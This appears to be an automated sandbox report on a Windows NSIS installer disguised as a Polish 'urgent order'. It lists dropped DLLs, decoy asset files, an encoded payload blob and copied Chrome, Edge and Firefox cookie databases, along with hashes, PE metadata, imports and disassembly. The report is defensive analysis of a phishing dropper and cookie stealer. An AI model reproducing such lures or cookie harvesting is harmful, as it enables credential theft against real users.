Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.770803561213006
Encrypted:	false
SSDEEP:	192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
MD5:	2AE993A2FFEC0C137EB51C8832691BCB
SHA1:	98E0B37B7C14890F8A599F35678AF5E9435906E1
SHA-256:	681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
SHA-512:	2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: inq 0394511 JPG.exe, Detection: malicious, Browse Filename: inq 0394511 JPG.exe, Detection: malicious, Browse Filename: Purchase order 3812_xls_.exe.exe, Detection: malicious, Browse Filename: Purchase order 3812_xls_.exe.exe, Detection: malicious, Browse Filename: Purchase order 3812_xls_.exe.exe, Detection: malicious, Browse Filename: Purchase order 3812_xls_.exe.exe, Detection: malicious, Browse Filename: Purchase order 3812_xls_.exe.exe, Detection: malicious, Browse Filename: Scan_Doc.docx.exe, Detection: malicious, Browse Filename: Scan_Doc.docx.exe, Detection: malicious, Browse Filename: KoRdtkxn6c.exe, Detection: malicious, Browse Filename: KoRdtkxn6c.exe, Detection: malicious, Browse Filename: Jjfmcz1Hsz.exe, Detection: malicious, Browse Filename: Jjfmcz1Hsz.exe, Detection: malicious, Browse Filename: PmRXFyOFkf.exe, Detection: malicious, Browse Filename: PmRXFyOFkf.exe, Detection: malicious, Browse Filename: Lakeringernes (1).exe, Detection: malicious, Browse Filename: Lakeringernes (1).exe, Detection: malicious, Browse Filename: proforma.exe, Detection: malicious, Browse Filename: proforma.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dll

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\0bpuok1y.lva\Chrome\Default\Cookies

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	2.9216957692876595
Encrypted:	false
SSDEEP:	384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
MD5:	1A706D20E96086886B5D00D9698E09DF
SHA1:	DACF81D90647457585345BEDD6DE222E83FDE01F
SHA-256:	759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
SHA-512:	CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
Malicious:	false
Preview:	SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\0bpuok1y.lva\Edge Chromium\Default\Cookies

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 7, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.3172897780113213
Encrypted:	false
SSDEEP:	96:oNwCz2C+NR73QOaq9kozeav2RT3VnnnekEEN9ORelnasL:ouZC+NJLaqe0LUTpnn1DN9OROnj
MD5:	D5ECE7413F423743B368D55921D78C0A
SHA1:	3F1E854E373FB2F9BFD868AF38AF5C6B3CD2A71D
SHA-256:	D38D8A693CD4B718EA9E4995939262749893878EE9A0931BEB0F33781979FD77
SHA-512:	F54CAB99D2795DF2D01E54D1E1184D116A56E8053140BAF868ADBFC7EE35EFBC59F83E3FF26C84E0D6D1A118BB79CAB82527F1502D328483953A0A58BEED8E0B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\0bpuok1y.lva\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	18048
Entropy (8bit):	5.781710632242959
Encrypted:	false
SSDEEP:	384:PDNDRvozv1hgXptjLrzs4AvgWOMrq0eMDI/:ZRvA4r77ARg/
MD5:	270209B12F7C117C539F574CE2576C0A
SHA1:	184B447F6364FA0760F862B84CBC6E717C9F5C3D
SHA-256:	C5DB3358A184147D6FFB41F05BBF9BA9356038A0867A783F266EA62813EF6CF4
SHA-512:	BB062EF832EB2B477D92FDF71C0B6B30AA590A735DEC1920400C3DA74EC07FF1F1DBF9E50E63EE2FDD68E9E48FC39F5522DFF0A029E47658A41F88EEC9FD250A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...W..S.........." .....0............... .....@..... ....................................@...@......@............... ...............................`...............8..............dM............................................................... ..H............text...6.... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..BH..........\#..........`&........................................................{...."..}......{...."..(.......0............}.....o......-.(....s....z.r...p..o......o....(.....(....-.(....s....z.r3..p..o.....(....o...+&.o.....r_..p..o.....o....&.o....&.o.....r...p..o.....o......,...(....o...+(....(.....r...p..o.....o.....r...p..o......(...(....(.....+...(....(.....,...(....(....2.(....o...+...0..%..........(.....o....o...+&.o......,..(.....o...+&.{....9......-...(.........(.

C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Reinspired.Aut

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	ASCII text, with very long lines (50244), with no line terminators
Category:	dropped
Size (bytes):	50244
Entropy (8bit):	3.999625167208849
Encrypted:	false
SSDEEP:	768:4Kt0hO4obUZX9nvBHp7RJ+CqqSK0haV6RTFA9yu7m1HK0TWgKL383w6gW:81oq9nvjqqSiUu9yu7m1HzT4L38AhW
MD5:	21337BAB1F65E60A88523B4DDB961E52
SHA1:	AD9C448F53AB48C3110D25650BACFE44C1988D51
SHA-256:	E2565D3B49D70ACDAD0AB4162BA0FBF738F227A0EC224982A813E874C46C0FCE
SHA-512:	A6DAE16844C6A433AFF4EDE77F0E77984073CEC0E38D439B57144670EE0F4034BD5F2FFCB6647010F6717A7F39928A6F04E7F05BA9511745F38CF6A49891FFDA
Malicious:	false
Preview:	56E3E082070CC707B0B701B836A6FEDCB0D7E6E50989CF2DA81B4311EF928EBF02F09C7EB977BC9031BA864CC44F17929BE2524D78FC507F411DCBC91BE502D51D27CA45924DFC91765F6EB7845C91C0D665E583A8AD0203D0E4E6E6CD17355A6BEE2CB460D8FEE6D05422DDF5EE3A100E5B5DF7E16AF5EE06574C03F45CF5AB392237D86BD7BA856648AFC8934A58C5CB26436F55DDADFBBF10B9B4879334CB8EC34E3188C13AB624B5BD476E64AE8E29F5D01B1F4990A3C97BFCFF07D4B1C9164FF864EC64F66817B8CB32DEDF9FCDD8BFEA77F0E8FA2FF734E9693AB8DB0E567BF76D363F5446629BF43E8658F94A657CA3A4E1F8CBE2A0DF2079A857E95B935916B09270CBD505DC004B5398C830A48C5BEC0BF51F45B3CF8B5BB54C379E941830FBE112B9AA311E3DDCB33515B088213DF149B237AA4C2FDEF37D6456FA22C12527A4B8369506B1AD0523F47A8479C3F96173652E3E9D10BC37BBDA514166816FEB43067D30B2F3AF7514968878341027AC20B0A426E2E7C25DCBA0B6FED381151DDA1B09092FF33782B8325E6B87234F9652F4DB96B3783CDA3D515E98CEDAACDBA19D8B6F8900215829145E262A081177B80AA3834EDBFF2F96C95ED77E31546A6F59C87BE0A467B5CF31606F7D2E6453A34C7B7AF3DAFCFB71E6B5770C2B1BC25C472C3653338393230C4F9FFB4398AD

C:\Users\user\Pacifisterne\Automatcafeer\Seacross.Him

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	data
Category:	dropped
Size (bytes):	285823
Entropy (8bit):	7.384888860358361
Encrypted:	false
SSDEEP:	3072:RPwTCrZk0BdcUdJ9bh2df3UvT1q3olHbVfvco8uKbtfEqL42V9oCWRtTT5sEgZOF:hTe00ykdvUvT1XGcofEmopbtlXF
MD5:	6CD4A3E95E9C6BA051D63C5177522F4B
SHA1:	38CBCD09C46F8637421F4D604C9C634A755D7EB0
SHA-256:	98BBC8D8E0B70E12F3A2C541CA197D27FFBC4B25BEDB517E0C510A20F0EEAC17
SHA-512:	E23F984A19945EB3A0595F5AB74D9C7D5EFDDC03B12CB376AAC4FF301B614619C7DB625387DCB8F9339F1F0EB148C329652FF9303FD053A74618E51CF8232116
Malicious:	false
Preview:	XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

C:\Users\user\Pacifisterne\Automatcafeer\Syntaksgenkendelsernes\Temposkifterne\default.css

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	19729
Entropy (8bit):	4.854870578875106
Encrypted:	false
SSDEEP:	384:SfWIec2c8Fn9khSO774VZE+HDxYADgab6YDrvCEE5c:SfWpc8Fn9khSO3yZE+HFYADJv/E5c
MD5:	A9006B652EBD39E033121BBAD1D45AC9
SHA1:	A9A681BD5801984388334C85B8E09561A21913FF
SHA-256:	E84FAFC9058C23AD27C2BE6BB8ED9CAC9AAC1744376330D53D7D531C1EA3EABE
SHA-512:	0B2F899C1FB7030F5ACA15E4F23F250CC62D5014ECBAE0E5CE738F9172895AB82C2B93693F3A078EC3642B3549355E25DA16834A9714CCF8B33087ED3BACAF1B
Malicious:	false
Preview:	/. This file is part of the LibreOffice project.. . This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this. * file, You can obtain one at http://mozilla.org/MPL/2.0/.. . This file incorporates work covered by the following license notice:. . Licensed to the Apache Software Foundation (ASF) under one or more. * contributor license agreements. See the NOTICE file distributed. * with this work for additional information regarding copyright. * ownership. The ASF licenses this file to you under the Apache. * License, Version 2.0 (the "License"); you may not use this file. * except in compliance with the License. You may obtain a copy of. * the License at http://www.apache.org/licenses/LICENSE-2.0 .. /./.+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.+ LIBREOFFICE HELP IN BROWSER +.+ DEFAULT STYLE

C:\Users\user\Pacifisterne\Automatcafeer\Syntaksgenkendelsernes\Temposkifterne\network-cellular-signal-none-symbolic.svg

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	660
Entropy (8bit):	4.929915592008811
Encrypted:	false
SSDEEP:	12:t4CDqaZnoUJgiCydrkeYRAerAFFLAmLRHGdK5D9DME:t4C9ZoUJyyKbRAecFxfRHGMRtME
MD5:	96756F6658DD20BCB387DECC6C2FB720
SHA1:	42E06BBF711B5F71D07B965A0654AFF6249B99D6
SHA-256:	C15238E9B65995BDADC206340B33E7B7E50EF00031F5B61DF9700BBB5350F635
SHA-512:	F64F1B4C96611ADF276F87F242501534DA8D9D2A17A00749A4FE05DE051DA5CAEDF545D39D574BB7E6447CC272C5F9BF2E8B0EE88B277EDDB46D1E263C08FA1B
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M8 4v11h3V4zm4-3v14h3V1zM4 7v8h3V7zm-4 3v5h3v-5z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal" overflow="visible" opacity=".35" color="#000" font-weight="400" font-family="sans-serif" fill="#474747" fill-rule="evenodd"/></svg>

C:\Users\user\Pacifisterne\Automatcafeer\Tubulating\application-x-executable.png

Process:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	981
Entropy (8bit):	7.490445024712213
Encrypted:	false
SSDEEP:	24:Xtk15wEzJDA4IttcJtoyV+i2FgT17uiW1cWhncisE:XtkHj2t2HoyQxgJY/bsE
MD5:	57788EB5F2415CF88CDDF86A995B497F
SHA1:	CDF8E6B6E0F823C6A77EA66569B61BE5D760BF96
SHA-256:	08F67C366FB7F3371CA2E3B65DA0A4F9AEBD57D18A2990CB7571A8C2ECAD5D41
SHA-512:	024EF704154FC9D0DC38679F1C017691A69E5282E58297F018C40C5957C409B74CFE5F70ACB6BF35CDE8631265366F4E987DF80C1D2E57639253D1CE6FCD5B68
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Icon Template...?....tEXtAuthor.GNOME Design Team`.v~...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb.....IDAT8...KHTa....w_s.<n3..dY..ZH.hW.ET+.R.....,.ha.hQ...m-J..,.....0(j.0.Ef..L.c53w.w.\|-"m\|.Y......p....9..0....2.r.{...t..G- ..hU%oU.B26..R.(j../.k.>......(.e..b[nNE#....Q..?......'...Nj.x..h.....!'..Zsu......0p7.....+&..Q.a.;A)..l(.QU^".O.7............m/c..D....@. H..V.P...Qy.uJ.]...S[..z).x..\..G...I6.tn"N.`.YP.PP....0..1...v....f..>N\.o..Z.....r..yw.. ..@.H..1W.....7.2fP0V..&..h.........T...9=.L:..D7...H..........`....39d...z...[..........8...u.........X..1$..p6.G..`...}'.)..}'o.\|.Ttb(-..xAD......D....T>.n..Nw..A...w...!-2....N.....U....Hhq.._$..i.~v.k.!.@b.oH....E&vj.).f.t...8^.{Sy=s1.{.._f./$G...5....x..........@...O[..........`.NB@e.o......t.....V..`U....IEND.B`.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.874744026790643
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
File size:	669600
MD5:	17388d36388d280c4e2d724c9ab58002
SHA1:	ee660100dfbad59a2796244514bff64c66cd0ca7
SHA256:	5f20a33e263b8b8f5388b8e2512d0678312257b8fdf592b8a83aa481076048ca
SHA512:	b49d055149f26ce72cd04ecd6fd581523fdeaf7f3234e8b547fa0fedbaf52aae6b408480c4cebdb7359422d9ae7664dcd8a083d99f13d9fbc1692d4914895ce4
SSDEEP:	12288:Pkvld8NVtfkug41IDHQ215k5P5x2/dKRy6i5y:PeHiMrQ2HkLI/ki5y
TLSH:	40E4F6527059808AE8A738F3685FC07014A02EAD92EDD25E66F67B2645F2313CC5FF9D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	3319396623190917

Static PE Info

General

Entrypoint:	0x4030d9
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Dictatorialism, OU="Innervational Chloropal Stald ", E=Covalency@Bedrveligheds.Sl, O=Dictatorialism, L=Tarrant Rushton, S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/01/2023 08:31:02 23/01/2026 08:31:02
Subject Chain	CN=Dictatorialism, OU="Innervational Chloropal Stald ", E=Covalency@Bedrveligheds.Sl, O=Dictatorialism, L=Tarrant Rushton, S=England, C=GB
Version:	3
Thumbprint MD5:	7F1F45BD7FCC95B4458C5EC8BFA17430
Thumbprint SHA-1:	31BE90317316BB6D5DBEDE711C3E03BCD2EF533A
Thumbprint SHA-256:	801CB0CF2041D9240AC71DE2FCEEC2FA0C23383EF6BEA436ECE5CCF3C1CB066D
Serial:	E5205A57DA732B09

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007FD0F0574393h
push ebx
call 00007FD0F0577301h
cmp eax, ebx
je 00007FD0F0574389h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FD0F057727Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FD0F057436Dh
push ebp
push 00000009h
call 00007FD0F05772D4h
push 00000007h
call 00007FD0F05772CDh
mov dword ptr [00423704h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407174h]
push 00409188h
push 00422F00h
call 00007FD0F0576EF7h
call dword ptr [0040709Ch]
mov ebp, 00429000h
push eax
push ebp
call 00007FD0F0576EE5h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e000	0x5aec8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa3078	0x728
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c5b	0x5e00	False	0.6603640292553191	data	6.411456379497882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	False	0.6376953125	data	5.108396988130901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x1a000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3e000	0x5aec8	0x5b000	False	0.23903245192307693	data	5.402063687419607	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3e2b0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States
RT_ICON	0x802d8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States
RT_ICON	0x90b00	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States
RT_ICON	0x94d28	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x972d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x98378	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x987e0	0x100	data	English	United States
RT_DIALOG	0x988e0	0x11c	data	English	United States
RT_DIALOG	0x98a00	0xc4	data	English	United States
RT_DIALOG	0x98ac8	0x60	data	English	United States
RT_GROUP_ICON	0x98b28	0x5a	data	English	United States
RT_MANIFEST	0x98b88	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
